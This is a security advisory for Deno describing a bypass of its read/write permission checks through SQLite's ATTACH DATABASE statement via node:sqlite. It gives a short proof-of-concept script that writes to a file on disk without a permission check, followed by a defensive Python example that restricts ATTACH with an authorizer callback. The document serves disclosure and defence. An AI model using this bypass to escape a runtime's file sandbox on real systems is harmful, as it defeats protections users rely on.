- Reported:
- Issued:
- Package: deno (crates.io)
- Type: Vulnerability
- Keywords: #read-write-bypass
- Aliases:
- References:
- CVSS Score: 5.5 MEDIUM
- CVSS Details:
  - Attack Complexity: Low
  - Attack Requirements: None
  - Attack Vector: Network
  - Privileges Required: None
  - Availability Impact to the Subsequent System: None
  - Confidentiality Impact to the Subsequent System: None
  - Integrity Impact to the Subsequent System: None
  - User Interaction: None
  - Availability Impact to the Vulnerable System: None
  - Confidentiality Impact to the Vulnerable System: None
  - Integrity Impact to the Vulnerable System: Low
  - Exploit Maturity: ProofOfConcept
- CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
- Patched:
- Unaffected:

Description

It is possible to bypass Deno's read/write permission checks by using the SQLite ATTACH DATABASE statement through node:sqlite.
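
PoC

// poc.js
import { DatabaseSync } from "node:sqlite";

// An in-memory database needs no file permissions.
const db = new DatabaseSync(":memory:");
// ATTACH opens test.db on disk without a read/write permission check.
db.exec("ATTACH DATABASE 'test.db' as test;");
// Creating a table in the attached database writes to that file.
db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);");

$ deno poc.js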
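
The underlying pattern is a SQL statement that opens a file the embedding runtime's permission layer never sees. As an added example (not taken from the advisory or from Deno's code, and not a description of Deno's fix), this Python program uses SQLite's authorizer callback to restrict ATTACH to an allowlist of directories. The helper names, the allowlist policy and the temporary directory layout are assumptions made for the illustration.

```python
import sqlite3
import tempfile
from pathlib import Path


def make_attach_guard(allowed_dirs):
    """Build an authorizer that only lets ATTACH open files under allowed_dirs."""
    roots = [Path(d).resolve() for d in allowed_dirs]

    def authorizer(action, arg1, arg2, db_name, source):
        if action != sqlite3.SQLITE_ATTACH:
            return sqlite3.SQLITE_OK
        # SQLite passes the filename only when it is a string literal; a bound
        # parameter arrives as None, so fail closed. URI filenames are refused.
        if arg1 is None or arg1.startswith("file:"):
            return sqlite3.SQLITE_DENY
        if arg1 == ":memory:":
            return sqlite3.SQLITE_OK
        target = Path(arg1).resolve()  # collapses ../ and follows symlinks
        inside = any(target == r or r in target.parents for r in roots)
        return sqlite3.SQLITE_OK if inside else sqlite3.SQLITE_DENY
    return authorizer


def try_attach(conn, sql, params=()):
    """Return True if the ATTACH was authorized, False if SQLite refused it."""
    try:
        conn.execute(sql, params)
        return True
    except sqlite3.DatabaseError:
        return False


def demo():
    # Constructed layout: one directory the embedder granted, one it did not.
    with tempfile.TemporaryDirectory() as base:
        allowed, outside = Path(base, "allowed"), Path(base, "outside")
        allowed.mkdir()
        outside.mkdir()
        conn = sqlite3.connect(":memory:")
        conn.set_authorizer(make_attach_guard([allowed]))
        results = {
            "inside": try_attach(conn, f"ATTACH DATABASE '{allowed / 'ok.db'}' AS a"),
            "outside": try_attach(conn, f"ATTACH DATABASE '{outside / 'x.db'}' AS b"),
            "traversal": try_attach(conn, f"ATTACH DATABASE '{allowed / '..' / 'outside' / 'x.db'}' AS c"),
            "bound": try_attach(conn, "ATTACH DATABASE ? AS d", (str(allowed / "p.db"),)),
        }
        conn.close()
        return results
```

Because the authorizer runs when the statement is prepared, a denied ATTACH fails before SQLite opens or creates the target file.
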

Advisory available under CC-BY-4.0 license.
Source: https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596